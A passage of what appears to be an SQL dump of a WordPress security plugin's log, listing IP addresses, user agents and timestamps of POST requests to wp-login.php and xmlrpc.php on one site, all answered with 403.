Firefox\\/96\"}','0MEDXQ2xujwhC4eqtdnvVOo6',0,1664257561.5004,13444,'','POST',403,0,515,0,1,'',0),('203.112.72.51',3413133363,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','JWRko3q7Q8NfpIwjcn9lUm5L',0,1664257556.5713,18415,'','POST',403,0,515,0,1,'',0),('103.153.214.231',1738135271,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','9Yt5pFAgl7Gefm4uPELOxicD',0,1664257864.5944,18868,'','POST',403,0,515,0,1,'',0),('108.167.132.70',1822917702,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','3Em0lAIP5RG6gFM47Jk8uSTZ',0,1664257883.5082,645,'','POST',403,0,515,0,1,'',0),('67.205.39.9',1137518345,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/58.0.3029.110 Safari\\/537.36\"}','aBf7Z8lGYEkqmjQ9NdK625rc',0,1664258006.8524,17220,'','POST',403,0,600,0,1,'',0),('212.33.197.207',3558983119,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','KsbAOntJWP8ypz9XraIfek5u',0,1664258495.9691,3003,'','POST',403,0,515,0,1,'',0),('104.243.26.114',1760762482,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','g75nrxQBUihqyAdX0jIte4Hb',0,1664258491.7546,7237,'','POST',403,0,515,0,1,'',0),('88.135.37.49',1485251889,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','2GOcU1ESNV80Wy4anvjdAm6e',0,1664259234.2625,528,'','POST',403,0,600,0,1,'',0),('128.199.108.205',2160553165,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','SHlofsbpwNgXGBWEcPTJ53er',0,1664259728.2806,525,'','POST',403,0,600,0,1,'',0),('188.164.193.195',3164914115,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','3481l6AQ5mihDSWONasUEePI',0,1664259760.3110,558,'','POST',403,0,600,0,1,'',0),('184.168.125.241',3098050033,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Q6gxDNKkSXmYPrTF8sCUod3y',0,1664260326.4433,493,'','POST',403,0,600,0,1,'',0),('134.19.179.139',2249438091,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','PHXB51gE7V6iJeFS8bondZGK',0,1664260758.6863,17036,'','POST',403,0,515,0,1,'',0),('51.89.47.206',861482958,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.70 Safari\\/537.36\"}','ATqcEHB6DdMG3i4QXeJYW0Sv',0,1664260870.1857,17944,'','POST',403,0,600,0,1,'',0),('51.159.105.232',866085352,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','1uH5zmRy7bM3aGZ82cNUwDse',0,1664260895.2209,542,'','POST',403,0,600,0,1,'',0),('43.129.212.158',729928862,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','tjLhyNKY6vHrzGwXcxpnk389',0,1664261536.3830,576,'','POST',403,0,600,0,1,'',0),('162.14.71.142',2718844814,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','j0d58NR67Gg9tYwhVHmqMiDo',0,1664261560.5209,511,'','POST',403,0,600,0,1,'',0),('34.75.65.218',575357402,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.94 Safari\\/537.36\"}','7Qzdop8acPW3JsNvZbxfThyu',0,1664261832.3011,17587,'','POST',403,0,600,0,1,'',0),('95.81.81.219',1599164891,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','NZV6cds95v8JlHk7GuFACioe',0,1664262823.4484,465,'','POST',403,0,600,0,1,'',0),('138.128.173.10',2323688714,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','0ksvb8xzRuyQlq6wCSjrK4JA',0,1664263461.3596,503,'','POST',403,0,600,0,1,'',0),('51.15.160.148',856662164,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','3flYbc1XJ6QRS2GxgsU9ByvD',0,1664263524.5353,498,'','POST',403,0,600,0,1,'',0),('143.244.155.35',2415172387,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.94 Safari\\/537.36\"}','tArhOqy98nYE3WDwZULjcH6B',0,1664263765.5007,2643,'','POST',403,0,600,0,1,'',0),('134.19.179.147',2249438099,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','afb5B0Mw6KmyHChSEcTWPO9u',0,1664264026.3907,18379,'','POST',403,0,515,0,1,'',0),('107.180.103.185',1806985145,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','iEK1WsJtNPTHvX8FheuS243q',0,1664264118.6416,513,'','POST',403,0,600,0,1,'',0),('103.159.4.98',1738474594,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','OCmnXGLEH0akvqBMfP35Sobw',0,1664264125.1617,509,'','POST',403,0,600,0,1,'',0),('45.55.44.23',758590487,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.87 Safari\\/537.36\"}','9JsOGVyKk3YPmDvhBqtxoHR5',0,1664264738.5045,479,'','POST',403,0,600,0,1,'',0),('139.59.228.23',2335958039,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','nVJ65a4k3Ah7SCcs8g1j9YNw',0,1664264791.0003,541,'','POST',403,0,600,0,1,'',0),('190.145.68.131',3197191299,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','xpY5eZcyk1jK0ozHhDqaMbnQ',0,1664264811.9891,470,'','POST',403,0,600,0,1,'',0),('123.31.41.38',2065639718,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','35VDvK4Z2uMFLocpylAhdWjz',0,1664265469.2184,489,'','POST',403,0,600,0,1,'',0),('35.211.94.153',601054873,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','XcJ2M6EYvqFyNPU1bopVusLe',0,1664265492.4707,460,'','POST',403,0,600,0,1,'',0),('43.225.53.24',736179480,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','GusIe3FlWw7Rg89mrqo64kja',0,1664266168.9887,530,'','POST',403,0,600,0,1,'',0),('84.39.116.180',1411871924,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','At3WL6oNxic0VsF1MUKBvaYD',0,1664266811.5243,18777,'','POST',403,0,515,0,1,'',0),('122.17.148.164',2047972516,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','VvEKyMWOuBcd6FPam47L3h0r',0,1664266830.5034,1206,'','POST',403,0,600,0,1,'',0),('51.255.64.58',872366138,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','FZABTWVdzjJrCPoqxEugneaM',0,1664266898.2388,543,'','POST',403,0,600,0,1,'',0),('103.74.120.192',1732933824,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','wHGlMjcF3xUtoDgb6LkQhpWv',0,1664267515.5058,508,'','POST',403,0,600,0,1,'',0),('124.70.98.118',2084987510,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','0MWxN9sLoG5AuvUSXb6RjZaP',0,1664267555.9429,451,'','POST',403,0,600,0,1,'',0),('46.182.4.117',783680629,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','jocahizCTR873O4UBJy5ZsFm',0,1664268209.7504,545,'','POST',403,0,600,0,1,'',0),('185.197.195.173',3116745645,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','nHiJhQpEFz3KYwS8PvtkeC2o',0,1664268210.4359,547,'','POST',403,0,600,0,1,'',0),('124.70.98.118',2084987510,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','L9ybIRwFn74ziCeorGxjNsA6',0,1664268908.3127,1086,'','POST',403,0,600,0,1,'',0),('51.68.228.235',860153067,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','r9DXCSQjW0NdJtxKkzMEo4lO',0,1664268910.5676,510,'','POST',403,0,600,0,1,'',0),('51.210.99.98',869426018,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','cgkwMoVWuOrspldhLPz2aGHD',0,1664270274.4513,568,'','POST',403,0,600,0,1,'',0),('13.76.135.117',223119221,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','8mduf4qHtUSbDwhBY1QVWKNZ',0,1664270305.1750,544,'','POST',403,0,600,0,1,'',0),('193.176.230.188',3249596092,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Cws6PRfeYNInvz59hH0Vy8ir',0,1664270978.4058,516,'','POST',403,0,600,0,1,'',0),('137.184.140.67',2310573123,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','h8SBDrvP4pa30qbj5zQNXm2F',0,1664270990.3617,500,'','POST',403,0,600,0,1,'',0),('103.56.160.61',1731764285,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','jk58dUhwEzovJVFI2SLncgau',0,1664271670.8715,511,'','POST',403,0,600,0,1,'',0),('186.234.80.121',3135918201,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','7mIvoyAWOkXuDiQTg8RYj93H',0,1664271682.9986,550,'','POST',403,0,600,0,1,'',0),('213.152.186.163',3583556259,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','7Me1QYfG5o3cF04DkAPrbjim',0,1664271852.8102,2242,'','POST',403,0,515,0,1,'',0),('107.180.103.185',1806985145,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','5dD4vAYjfrl8NzBxeC601UiR',0,1664272350.1581,473,'','POST',403,0,600,0,1,'',0),('157.245.166.98',2650121826,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','UJCPK9kxitS3Ma7OclAuBowL',0,1664272378.2319,492,'','POST',403,0,600,0,1,'',0),('209.141.48.210',3515691218,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident\\/6.0)\"}','eW45DBkw7S3aPMizFjGb2rtd',0,1664272567.0820,1213,'','POST',403,0,600,0,1,'',0),('217.138.195.19',3649749779,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','5EAKySHmfIZRs8ePBnbL43FC',0,1664274073.6632,4903,'','POST',403,0,515,0,1,'',0),('124.222.127.109',2094956397,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','WNMzuli98jbP6fQZaS7xIOdT',0,1664274453.9254,448,'','POST',403,0,600,0,1,'',0),('111.90.145.188',1868206524,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','LxIGrS1oOY69bpq5sXaJc24w',0,1664274463.0399,498,'','POST',403,0,600,0,1,'',0),('67.205.39.9',1137518345,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/54.0.2840.99 Safari\\/537.36\"}','uSNDtVbyvKLTpQB4Gohn9WrF',0,1664274750.2907,5577,'','POST',403,0,600,0,1,'',0),('85.95.146.83',1432326739,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','sRuhX5OC3tkaSKiJ9yxUBz1L',0,1664275100.3253,513,'','POST',403,0,600,0,1,'',0),('177.222.54.214',2984130262,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','AxZwb2hEQ35mIXy1eFNsnRSU',0,1664275118.0826,539,'','POST',403,0,600,0,1,'',0),('146.56.99.136',2453169032,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/73.0.3683.86 Safari\\/537.36\"}','yYHNgWx7GnukS3V8OjPM5L9A',0,1664275707.5871,17249,'','POST',403,0,600,0,1,'',0),('128.199.178.73',2160570953,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','xzcyZREpCq1jsltLH3faoD2I',0,1664275828.3008,502,'','POST',403,0,600,0,1,'',0),('111.90.150.171',1868207787,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','V1DreEcb2XMgq53Uynax9Pof',0,1664275863.6809,537,'','POST',403,0,600,0,1,'',0),('198.46.146.101',3324940901,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.131 Safari\\/537.36\"}','TU1ncE0XQdlOhJAPW98tB6uM',0,1664277126.7041,13089,'','POST',403,0,515,0,1,'',0),('20.239.161.138',351248778,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko\\/20100101 Firefox\\/73.0\"}','Ev3BynbarCuhwc0zDmpXAMPJ',0,1664277122.0383,17849,'','POST',403,0,515,0,1,'',0),('87.239.23.107',1475286891,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/44.0.2403.157 Safari\\/537.36\"}','y573UlrTFSmafYAeK48Vux02',0,1664277125.5042,14392,'','POST',403,0,515,0,1,'',0),('92.205.10.44',1556941356,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.138 Safari\\/537.36\"}','4FEKInqvDGL1xBHJR3VbrZTw',0,1664277141.1934,592,'','POST',403,0,515,0,1,'',0),('213.136.79.233',3582480361,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/83.0.4103.116 Safari\\/537.36\"}','I97BHZV58hDJ1oaRsKYuxzCN',0,1664277144.8305,1491,'','POST',403,0,515,0,1,'',0),('114.132.201.19',1921304851,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko\\/20050716 Firefox\\/1.0.6\"}','1skrt3z0DvLTi6aKx5mMunIh',0,1664277144.8146,1712,'','POST',403,0,515,0,1,'',0),('68.183.26.89',1152850521,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:17.0) Gecko\\/20100101 Firefox\\/20.6.14\"}','7bRYg8mIWyOKeTuNw1d3kplv',0,1664277145.8832,947,'','POST',403,0,515,0,1,'',0),('31.170.166.144',531277456,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','Am43kqTsJuRYOnQeP5hVrSE7',0,1664277149.0890,476,'','POST',403,0,515,0,1,'',0),('185.107.112.170',3110826154,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.88 Safari\\/537.36\"}','Gmfc9IxqTCezkM0AFbnyYa2V',0,1664277151.2302,526,'','POST',403,0,515,0,1,'',0),('217.21.77.162',3642052002,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','SG7WIf4mpdqVXrbQDTM1tLay',0,1664277152.9415,506,'','POST',403,0,515,0,1,'',0),('134.209.206.208',2261896912,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','eEJpVHhOaIXgULTy6C4cDGm1',0,1664277160.3045,734,'','POST',403,0,515,0,1,'',0),('61.222.243.149',1038021525,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','egWtFI3U1jJLnVKhNivQqT98',0,1664277197.0499,492,'','POST',403,0,600,0,1,'',0),('101.43.127.191',1697349567,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','2Gvj9NCy4oKsReYuzSZQfFh6',0,1664277279.8922,487,'','POST',403,0,600,0,1,'',0),('107.189.6.184',1807550136,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2; WOW64; rv:31.0) Gecko\\/20100101 Firefox\\/31.0\"}','OG50IlmiN4KHyT3rLCYUqBwM',0,1664277739.7331,520,'','POST',403,0,600,0,1,'',0),('31.210.66.35',533873187,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','mIb9Pxn2S8cAQlygsVazJ3qR',0,1664277931.6287,579,'','POST',403,0,600,0,1,'',0),('41.93.82.7',693981703,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','NZHG2RTd4rsMJvaU7qW1KfXk',0,1664277945.4295,1540,'','POST',403,0,600,0,1,'',0),('202.29.236.140',3390958732,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','7QPcBgCHsARuUjN6labi8tSo',0,1664278650.2701,5837,'','POST',403,0,600,0,1,'',0),('31.184.242.14',532214286,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','PHhvmClobRtjx40NTsnwg6WU',0,1664278658.1458,480,'','POST',403,0,600,0,1,'',0),('41.93.82.7',693981703,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','KXudL9mGMknEHT5Vt8bw6IJc',0,1664278672.4178,536,'','POST',403,0,600,0,1,'',0),('212.38.40.215',3559270615,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','EVOj7hUmkAPMT4aF2LbY9fqB',0,1664279343.1279,1327,'','POST',403,0,600,0,1,'',0),('51.210.99.98',869426018,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','wZ0raq5HXSixElk1Rf7nG4gV',0,1664279344.1830,1958,'','POST',403,0,600,0,1,'',0),('209.141.46.253',3515690749,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.1916.153 Safari\\/537.36\"}','t8gd3kcCaQN2ZJ4P5rWuvIwX',0,1664279483.7431,1150,'','POST',403,0,600,0,1,'',0),('51.255.81.60',872370492,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','tUuekI5WGVy1i72xgMsHBRaF',0,1664279621.5911,8836,'','POST',403,0,600,0,1,'',0),('217.116.205.56',3648310584,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.102 Safari\\/537.36\"}','p3mjZB5Nx4RVe9IzkuQYfoWt',0,1664280248.3966,12765,'','POST',403,0,515,0,1,'',0),('50.62.177.214',842969558,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','1svK9g7c3EyRXtON8iBpukAV',0,1664280243.3881,17823,'','POST',403,0,515,0,1,'',0),('185.102.88.47',3110492207,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','AWl6V0fJuyr5njNpiIMoDsOg',0,1664280268.9821,1220,'','POST',403,0,515,0,1,'',0),('23.94.61.21',392051989,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.90 Safari\\/537.36\"}','b3FYC0ktv7WwpIALcd4gEamP',0,1664280269.9222,1697,'','POST',403,0,515,0,1,'',0),('185.102.88.47',3110492207,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','KD8Eg9VirGFwoabl37YWxBLP',0,1664280270.4361,1323,'','POST',403,0,515,0,1,'',0),('142.93.48.70',2388471878,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko\\/20050716 Firefox\\/1.0.6\"}','8w2q7ozlC9gjpvDxRZhWkOIG',0,1664280277.8249,573,'','POST',403,0,515,0,1,'',0),('51.89.228.130',861529218,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','VSvKe1WLpoRy9HFhmC5Z72GY',0,1664280292.1004,1726,'','POST',403,0,515,0,1,'',0),('213.136.79.233',3582480361,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.99 Safari\\/537.36\"}','jXnAzpSf9WQPJtMcUwFECRv7',0,1664280293.9989,686,'','POST',403,0,515,0,1,'',0),('64.71.32.81',1078403153,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q720) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','T8VBFIj41PvsGR96hK7eAroc',0,1664280297.6406,744,'','POST',403,0,515,0,1,'',0),('188.166.225.235',3165053419,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/48.0.2564.109 Safari\\/537.36\"}','9fLOvM7GdIw3grFNkasS6i2A',0,1664280606.6381,17569,'','POST',403,0,600,0,1,'',0),('167.99.54.31',2808296991,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 